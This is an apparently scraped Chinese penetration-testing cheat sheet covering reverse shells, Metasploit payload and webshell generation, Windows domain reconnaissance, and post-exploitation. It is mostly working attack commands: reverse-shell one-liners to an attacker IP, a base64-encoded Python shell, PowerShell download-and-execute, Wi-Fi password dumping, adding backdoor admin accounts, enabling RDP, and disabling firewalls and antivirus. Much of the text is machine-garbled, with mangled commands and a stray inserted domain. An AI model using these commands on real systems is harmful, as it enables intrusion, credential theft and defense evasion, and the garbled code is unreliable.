文章来源:互联网整理作者:招财猫手游网发布时间:2023-10-26 12:28:25
反弹壳
默认姿势
各种小姿势反弹
1.bash
接收Attacker
Nc-lvvp4444
运行Victim
bash-I/dev/TCP/attacker IP/44401
2 .常闭接点
-e选项支持
接收Attacker
Nc-lvvp4444
运行Victim
Ncattackerip4444-t-e/bin/bash
3.python
接收Attacker
Nc-lvvp4444
运行Victim
python-c ' importsocket、subprocess和OS;s=);S.connect(('attackerip ',4444));Os.dup2(),0);Os.dup2(),1);Os.dup2(),2);P=(['/bin/bash ','-I ']);'是
4.php
接收Attacker
Nc-lvvp4444
运行Victim
PHP-r ' $ sock=fsock open(' attacker IP ',4444);exec('/bin/sh-I 3323 ');'是
或者直接在web目录中写PHP文件,在浏览器中访问他即可。[用于linux和Windows的脚本](https://my . oschina . net/chinaher MIT/blog/1444)。
5.java脚本
R=Run()
P=r.exec (['/bin/bash ','-c ',' exe C5/dev/TCP/attacker IP/4444;Cat5 | whilereadlineDo $ line255Done']asString[])
P.waitFor()
6.perl脚本
perl-e ' uses ocket;$ i=' attackerip$ p=4444套接字(s、pf _ inet、sock _ stream、getprotobyname(' TCP '));If (connect (s,sockaddr _ in ($ p,inet _ aton($ I)){ open(stdin,' s '))开放(stderr,' s ');exec('/bin/sh-I ');};是
7.powershell
运行Victim
powershelliex(new-object net . webclient)。downloadstring(';);invoke-powershell TCP-reverse-ipaddressattackerip-port 4444
*生成MSFVenom通用payload *
1.生成二进制文件
对于二进制文件,主要介绍为Windows、Linux和MAC操作系统生成和利用payload。
Windowsmsfvenom-pwindows/meterpreter/reverse_tcpLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fexe>Linuxmsfvenom-plinux/x86/meterpreter/reverse_tcpLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-felf>Macmsfvenom-posx/x86/shell_reverse_tcpLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fmacho>如何利用?以Windows为例,使用上面的命令生成一个exe的payload,复制到Windows机器,然后kali下开启msf使用如下命令监听4444端口:msfconsoleuseexploit/multi/handlersetPAYLOADwindows/meterpreter/reverse_tcpsetLHOST<自己的IP>setLPORT4444setExitOnSessionfalseexploit-j-z执行完之后在Windows下执行2.生成webshell脚本在做web渗透的时候,经常会用到webshell,我们经常用的一句话用菜刀连接,如何使用MSFVenom生成一个可以用msf操作的webshell?PHPmsfvenom-pphp/meterpreter_reverse_tcpLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fraw>cat|pbcopy&&echo'<?php'|tr-d'n'>&&pbpaste>>ASPmsfvenom-pwindows/meterpreter/reverse_tcpLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fasp>JSPmsfvenom-pjava/jsp_shell_reverse_tcpLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fraw>WARmsfvenom-pjava/jsp_shell_reverse_tcpLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fwar>如何利用?下面以php为例做一下测试,使用以下命令生成一个webshell,在kali上使用msf执行下面的命令,监听端口4444:msfconsoleuseexploit/multi/handlersetPAYLOADphp/meterpreter_reverse_tcpsetLHOST<自己的IP>setLPORT4444setExitOnSessionfalseexploit-j-z将放在web目录下,使用浏览器访问,或者使用以下命令执行:php3.脚本shell关于使用脚本反弹shell的方式,主要以python、bash、perl为例。Pythonmsfvenom-pcmd/unix/reverse_pythonLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fraw>Bashmsfvenom-pcmd/unix/reverse_bashLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fraw>Perlmsfvenom-pcmd/unix/reverse_perlLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fraw>Powershellmsfvenom-pwindows/x64/meterpreter_reverse_httpLHOST=<YourIPAddress>LPORT=<YourPorttoConnectOn>-fpsh>power-ExecutionPolicyBypass-File如何使用?下面就以Python为例做一下测试,使用WWw.mUwuyA^.cOm以下命令生成一个脚本,在kali上使用msf执行下面的命令,监听端口4444:msfconsoleuseexploit/multi/handlersetPAYLOADcmd/unix/reverse_pythonsetLHOST<自己的IP>setLPORT4444setExitOnSessionfalseexploit-j-z然后复制中的内容在linux命令行下执行,如下:python-c"exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"信息收集
前期收集
queryuser||qwinsta查看当前在线用户netuser查看本机用户netuser/domain查看域用户netview&netgroup"domaincomputers"/domain查看当前域计算机列表第二个查的更多netview/domain查看有几个域netview\\\\dc查看dc域内共享文件netgroup/domain查看域里面的组netgroup"domainadmins"/domain查看域管netlocalgroupadministrators/domain/这个也是查域管,是升级为域控时,本地账户也成为域管netgroup"domaincontrollers"/domain域控nettime/domainnetconfigworkstation当前登录域-计算机名-用户名netuse\\\\域控(如)password/user:xxx.com\username相当于这个帐号登录域内主机,可访问资源ipconfigsysteminfotasklist/svctasklist/Sip/Udomain\username/P/V查看远程计算机tasklistnetlocalgroupadministrators&&whoami查看当前是不是属于管理组netstat-anonltest/dclist:xx查看域控whoami/all查看MandatoryLabeluac级别和sid号netsessoin查看远程连接session(需要管理权限)netshare共享目录cmdkey/l查看保存登陆凭证echo%logonserver%查看登陆域spn–ladministratorspn记录set环境变量dsqueryserver-查找目录中的ADDC/LDS实例dsqueryuser-查找目录中的用户dsquerycomputer查询所有计算机名称windows2003dir/s*.exe查找指定目录下及子目录下没隐藏文件arp-a其他命令
pingicmp连通性nslookupwww.baidu.comvps-ipdns连通性dig@vps-ipwww.baidu.comcurlvps:8080http连通性tracertbitsadmin/transfernhttp://iC:\windows\temp\x.exe一种上传文件>=2008fuser-nvtcp80查看端口pidrdesktop-uusernameiplinux连接win远程桌面(有可能不成功)wherefilewin查找文件是否存在找路径,Linux下使用命令find-name*.jsp来查找,Windows下,使用for/rc:\windows\temp\%iin(filel)do@echo%inetstat-apn|grep8888kill-9PID查看端口并kill发现密码
发现远程登录密码等密码:
wifi 密码:
netshwlanshowprofile查处wifi名netshwlanshowprofileWiFi-namekey=clear获取对应wifi的密码进阶命令
远程登录
判断是内网,还是外网,内网转发到 vps
netstat-ano没有开启3389端口,复查下tasklist/svc,查对应的TermService的pid,看netstat相等的pid即3389端口.添加账号
netuseradmin1admin1/add&netlocalgroupadministratorsadmin1/add*如不允许远程连接,修改注册表 *
REGADD"HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer"/vfDenyTSConnections/tREG_DWORD/d00000000/fREGADD"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp"/vPortNumber/tREG_DWORD/d0x00000d3d/f如果系统未配置过远程桌面服务,第一次开启时还需要添加防火墙规则,允许 3389 端口,命令如下:
netshadvfirewallfirewalladdrulename="RemoteDesktop"protocol=TCPdir=inlocalport=3389action=allow关闭防火墙
netshfirewallsetopmodemode=disable解决system权限3389无法添加的用户情况:
判断原因:I.杀软篇1.360杀毒软件2.麦咖啡杀毒软件3.卡巴斯基杀毒软件4.其他杀毒软件或防护软件II.策略篇1.3389端口变更2.莫名其妙无法添加账户3.管理员限制篇4.系统已达最大连接数处理———————–I.杀软篇—————————–1.360杀毒软件taskkill/im进程名.exe/f把主动防御结束。360相关进程如下:360有些SYSYTEM权限却干不掉360,例如360,可以先queryuser看看管理员状态,因为很可能是管理员登陆以后运行了图形界面没关闭,系统不执行taskkill所以logoff把管理员踢了,然后360有的进程就自己灭了,这种情况多出现在2008的server系统上2.麦咖啡杀毒软件完整一下过程就是,启用Guest账户,修改Guest用户的密码,添加Guest为administrators用户组这三条命令第二条或者第三条有时候可能不会显示命令执行成功,但是实际上只要是SYSTEM权限,就应该可以执行成功的,有无回显并不重要。netuserguest/active:yes//将guest用户启用netuserguestsilic!&11133//修改guest密码netlocalgroupadministratorsguest/add//添加guest到管理员用户组中3.卡巴斯基调整系统时间,让卡巴的key失效mkdir建立以非法字符“.”命名的文件夹,将pr等提权程序传进去。4.金山防护软件主要是KSataskkill搞不定就用ntsdntsd-cq-pPID金山毒霸+金山卫士+瑞星防火墙的组合可以将如下代码保存到c:\windows\temp\a.vbsDefaultsetwsnetwork=CreateObject("WSCRIPT.NETWORK")os="WinNT://"&wSetob=GetObject(os)Setoe=GetObject(os&"/Administrators,group")Setod=ob.Create("user","silic")od.SetPassword"silic"od.SetInfoSetof=GetObject(os&"/silic",user)oe.addos&"/silic"然后用如下命令执行,就能得到账户为silic密码为silic的管理员账户了:cscriptc:\windows\temp\a.vbs5.禁用服务法scconfig服务名start=disabled给杀软服务设置为禁用,重启服务器,杀毒防护服务就不能运行。就无阻畅通了,例如:scconfigMsMpSvcstart=disabled——————————–II,策略篇—————————–1.3389端口变更进行3389添加账户前首先要知道3389到底开启没有。netstat-ano查看端口和使用端口的进程pid,然后Tasklist看一下有哪个进程的pid使用了端口注意,是当中的某个。2.莫名奇妙无法添加账户把密码位数设置长一点就ok,原先密码是123456,现在改为1234abcd!@#$就过了如果还是添加不上,可以尝试用vbs脚本来添加3.管理员限制管理员直接把c:\windows\system32的net.exe给删了或者换了于是你直接net的时候会提示拒绝访问或者不是系统命令等。管你自己传一个自己的net.exe就突破了。当然,也有64位系统和你的程序不兼容的情况发生,他是64你就传64位的4.达到最大连接限制有时候添加了账户,但是连接提示最大连接数限制。首先queryuser查看在线的账户,然后看他的登陆ID,一般是0,最高不超过8,超过8说明服务器好久没重启了(这个没准的)然后logoffID,就把对应ID的管理员踢掉了。然后就能登录了。隐藏 win 账户
渗透技巧——Windows 系统的帐户隐藏
端口转发与代理工具
参考文章:
渗透测试中弹shell的多种方式及bypass
史上最强内网渗透知识点总结
解决system权限3389无法添加的用户情况